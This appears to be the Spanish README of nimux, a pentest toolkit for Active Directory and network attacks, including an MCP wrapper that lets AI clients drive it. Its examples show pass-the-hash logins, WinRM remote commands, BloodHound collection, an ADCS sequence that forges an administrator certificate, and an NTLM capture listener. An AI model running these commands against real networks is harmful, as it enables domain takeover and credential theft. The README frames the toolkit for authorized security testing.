
Pure-Nim toolkit de enumeración de red y ejecución remota para evaluaciones de seguridad autorizadas. Soporta SMB, LDAP, Kerberos, WinRM, clientes de bases de datos, recolección de secretos, DCSync, operaciones GPO y enrutamiento SOCKS.
Kit de enumeración de red y ejecución remota en Nim puro
nimux es una superficie de comandos nativa para evaluaciones de seguridad autorizadas. Combina enumeración de red, descubrimiento web ligero, validación de credenciales, operaciones de Active Directory, flujos de trabajo Kerberos, ejecución remota, movimiento de archivos, recolección de secretos, DCSync, operaciones GPO, clientes de bases de datos y enrutamiento SOCKS en un único kit en Nim puro.
Versión actual: v1.0.6
Estás en el repositorio público oficial de nimux.
nimux está diseñado únicamente para pruebas autorizadas. No lo uses contra sistemas de terceros sin permiso por escrito. Los desarrolladores no se responsabilizan del mal uso, daños o consecuencias legales.
Los ejemplos de uso, referencias de comandos y notas de flujos de trabajo se mantienen en la documentación:
La guía para agentes y los archivos de integración MCP están disponibles en SKILLS.md e integrations/.
El binario principal nimux permanece independiente. Las integraciones de IA deben llamar a nimux como motor de ejecución nativo, preferir --json, usar --dry-run antes de escrituras compatibles y requerir aprobación explícita para la ejecución o los cambios.
nimux-mcp es un wrapper MCP stdio independiente para clientes de IA.
Ubicación:
integrations/mcp/nimux-mcp
Compilación:
cd integrations/mcp/nimux-mcp
nimble build -y
Ejemplo de configuración de cliente MCP:
{
"mcpServers": {
"nimux": {
"command": "/path/to/nimux/integrations/mcp/nimux-mcp/nimux_mcp",
"env": {
"NIMUX_BIN": "/usr/local/bin/nimux",
"NIMUX_MCP_POLICY": "/path/to/policy.json"
}
}
}
}
El wrapper admite JSON-RPC con framing Content-Length de MCP, pruebas locales de JSON-RPC delimitadas por saltos de línea, comprobaciones de políticas, puertas de aprobación, redacción, notificaciones de progreso y metadatos de pivote SOCKS.
Más información:
https://docs.nimux.wiki/mcp-integration
Nimble compila nimux desde el código fuente, por lo que primero deben instalarse las bibliotecas de desarrollo nativas. En Kali, Debian o Ubuntu:
sudo apt update
sudo apt install -y build-essential ca-certificates git libssl-dev libkrb5-dev
nimble install nimux
No ejecutes Nimble con sudo. Si Nimble informa un error de certificado SSL,
actualiza el almacén de CA del sistema antes de reintentar:
sudo apt install --reinstall ca-certificates
sudo update-ca-certificates
nimble refresh
MinGW-w64 es opcional para la instalación base, pero es necesario para las rutas de ejecución que compilan binarios auxiliares de Windows:
sudo apt install -y mingw-w64
Los recursos de la versión precompilada están disponibles en GitHub:
https://github.com/blue0x1/nimux/releases
Descarga el binario Linux más reciente o el paquete Debian desde la página de versiones.
Instala el paquete Debian:
sudo dpkg -i nimux_*_amd64.deb
sudo apt --fix-broken install
Usa el binario Linux independiente:
chmod +x nimux
./nimux --help
./nimux --version
La imagen de contenedor pública está disponible en GitHub Container Registry:
docker run --rm -it --network host ghcr.io/blue0x1/nimux:latest --help
Ejecuta un escaneo:
docker run --rm -it --network host ghcr.io/blue0x1/nimux:latest \
scan 10.10.10.0/24 --port 445,389,5985 --open
Ejecuta descubrimiento web ligero:
nimux http app.example.local --dirs words.txt --workers 100 --status 200,301,302,403 --baseline
nimux http app.example.local --dirs words.txt --auto-calibrate --recursion --depth 2 --extract-links
nimux http app.example.local --files words.txt --extensions php,txt,bak --workers 100 --filter-regex 'Not Found' -fs 325
nimux http 192.0.2.10 --vhosts vhosts.txt -d app.example.local --workers 100 --resume seen.jsonl --json
nimux dns app.example.local --subdomains subdomains.txt --workers 200 --json
Ejecuta spidering SMB de solo lectura:
nimux smb files01.example.local --shares
nimux smb files01.example.local --spider --share Public --max-depth 3
nimux smb files01.example.local --spider --interesting --size-limit 10485760
Ejecuta el wrapper MCP:
docker run --rm -i --network host --entrypoint nimux_mcp \
ghcr.io/blue0x1/nimux:latest
nimux está disponible en el AUR:
https://aur.archlinux.org/packages/nimux
Instala con un asistente de AUR:
yay -S nimux
O compila manualmente:
git clone https://aur.archlinux.org/nimux.git
cd nimux
makepkg -si
nimux está disponible en BlackArch:
sudo pacman -S nimux
git clone https://github.com/blue0x1/nimux
cd nimux
nimble build -y
Requisitos:
Compila un paquete Debian local desde el código fuente:
dpkg-buildpackage -us -uc -b
sudo apt install ../nimux_*.deb
nimux scan 10.10.10.0/24 --port 445,389,5985 --open
nimux smb dc01.example.local -u operator -H <nt_hash> -d example.local --shares --users
nimux smb files01.example.local -u operator -p '<password>' -d example.local --spider --max-depth 3 --interesting
nimux ldap dc01.example.local -u operator -p '<password>' -d example.local --bloodhound --legacy --bloodhound-out bh-legacy.zip
nimux winrm host.example.local -u operator -p '<password>' -d example.local --cmd whoami
nimux kerberos dc01.example.local -u operator -p '<password>' -d example.local --request kinit --out <ccache>
nimux scan 10.10.10.0/24 --port 445,389,5985 --proxy socks5://127.0.0.1:1080
Ejemplos de flujo de trabajo de políticas ADCS y certificados:
nimux ldap dc01.example.local -u '<gmsa-account>$' -H <nt_hash> -d EXAMPLE.LOCAL \
--adcs-policy --ca CORP-CA --adcs-get-disable-extension-list
nimux ldap dc01.example.local -u '<gmsa-account>$' -H <nt_hash> -d EXAMPLE.LOCAL \
--adcs-policy --ca CORP-CA \
--adcs-set-disable-extension-list 1.3.6.1.4.1.311.25.2
nimux ldap dc01.example.local -u <service-user> -p '<password>' -d EXAMPLE.LOCAL \
--adcs-request --adcs-rpc --ca CORP-CA --template User \
--upn <admin>@example.local \
--sid S-1-5-21-1111111111-2222222222-3333333333-500 \
--out <admin>.pfx
Listener de captura LDAP:
nimux ldap --server
nimux ldap --server --srvhost 0.0.0.0 --srvport 2222
nimux ldap --server --srvhost 0.0.0.0 --srvport 2222 --challenge 1122334455667788